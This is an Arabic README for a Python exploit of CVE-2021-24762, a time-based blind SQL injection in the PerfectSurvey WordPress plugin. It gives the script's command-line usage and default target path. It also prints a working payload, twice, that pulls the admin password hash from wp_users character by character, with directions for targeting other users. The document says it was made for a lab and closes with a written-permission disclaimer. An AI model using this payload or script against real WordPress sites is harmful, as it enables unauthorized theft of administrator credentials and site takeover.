
يعرض هذا المستودع استغلالًا لـ CVE-2021-24762. وهو استغلال حقن SQL أعمى (Blind SQLi) يقوم، في الإعداد الافتراضي، باستخراج كلمة مرور المسؤول.
يعرض هذا المستودع استغلالًا لثغرة CVE-2021-24762. وهو استغلال حقن SQL أعمى (Blind SQLi) يقوم، في الإعداد الافتراضي، باستخراج كلمة مرور المسؤول.
أثناء قيامي بمختبر يعتمد على ووردبريس مع إضافة PerfectSurvey، علقت في ثغرة SQL. كان الـ PoC الوحيد المتاح الذي وجدته مبنيًا على sqlmap ولم يكن يعمل بشكل صحيح في المختبر الذي كنت أعمل عليه (كانت هناك الكثير من المشكلات الإضافية، مثل إرجاع التطبيق لـ 404، وتباين مهلات الانتظار بشكل كبير، ومشاكل أخرى. لذلك أنشأت هذا لاستغلال المختبر.
admin. هذا المستخدم هو الافتراضي في بيئات ووردبريس. ____ _ ___ ____
/ ___| / \ |_ _| / ___|
| | / _ \ | | \___ \
| |___ / ___ \ | | __ ) |
\____|/_/ \_\ |___| |____/
CAIS - Inteligência em Cibersegurança
Exploit for: CVE-2021-24762
usage: exploit_cve-2021-24762.py [-h] [-u URL] [-p PATH] [-d DELAY] [-t TIMEOUT] [-c CHARSET] [-m MAX_LEN] [-v]
Safe CLI wrapper — receives url/path/delay/timeout/charset and forwards it
options:
-h, --help show this help message and exit
-u, --url URL Base URL (default: http://192.168.10.10)
-p, --path PATH path (default: /wp-admin/admin-ajax.php)
-d, --delay DELAY delay in seconds (default: 30)
-t, --timeout TIMEOUT
timeout in seconds (default: delay + 15)
-c, --charset CHARSET
charset to be used (default: alnum + ./$_-@)
-m, --max-len MAX_LEN
maximum length (default: 20)
-v, --verbose activates log debugging
تستقبل السكربت بايثون المعاملات أعلاه. وفي حال لم يتم تمريرها، ينفذ السكربت بقيمه الافتراضية.
من الأفضل أن تمرر عنوان URL على الأقل. افعل ذلك باستخدام -u أو --url. المعاملات الأخرى ستعمل غالبًا بالقيم الافتراضية.
في الإعداد الافتراضي، سيحصل على تجزئة كلمة المرور للمستخدم admin. يُطبَّق هذا الإعداد في متغير payload، في قيمة user_login:
payload = f"1 AND (SELECT COUNT(*) FROM (SELECT 1 WHERE ORD(SUBSTRING((SELECT user_pass FROM wp_users WHERE user_login=0x61646d696e),{position},1))={ascii_code} AND SLEEP({delay})) AS a)"
في حال احتجت إلى العثور على التجزئة لمستخدم آخر، غيّر 0x61646d696e (admin) وفق احتياجاتك.
payload = f"1 AND (SELECT COUNT(*) FROM (SELECT 1 WHERE ORD(SUBSTRING((SELECT user_pass FROM wp_users WHERE user_login=0x61646d696e),{position},1))={ascii_code} AND SLEEP({delay})) AS a)"استخدام مقيد — يحتوي هذا المستودع على محتوى حساس مخصص للاستخدام الأخلاقي والمسؤول فقط. تذكر أنه يجب أن يكون لديك إذن كتابي من مالك النظام الذي تختبره. أي استخدام خارج هذا النطاق غير مسموح به وستقع المسؤولية عليك (هل تريد الذهاب إلى السجن؟).
exploit_cve-2021-24762 — الاستغلال.README.ME — هذا الملف.2025-10-10 — c4cnm — Creation and initial modifications
GNU General Public License v3 (GPL)